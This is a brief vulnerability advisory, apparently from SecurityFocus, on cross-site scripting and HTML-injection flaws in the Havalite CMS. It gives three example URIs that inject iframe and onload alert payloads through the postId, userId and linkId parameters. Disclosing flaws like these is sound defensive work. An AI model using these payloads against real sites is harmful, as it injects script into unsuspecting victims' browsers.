Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities

An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.

The following example URIs are available:

http://www.example.com/havalite/hava_post.php?postId=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/havalite/hava_user.php?userId=>"<iframe src=http://www.vulnerability-lab.com>
http://www.example.com/havalite/hava_link.php?linkId=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


 

Privacy Statement
Copyright 2010, SecurityFocus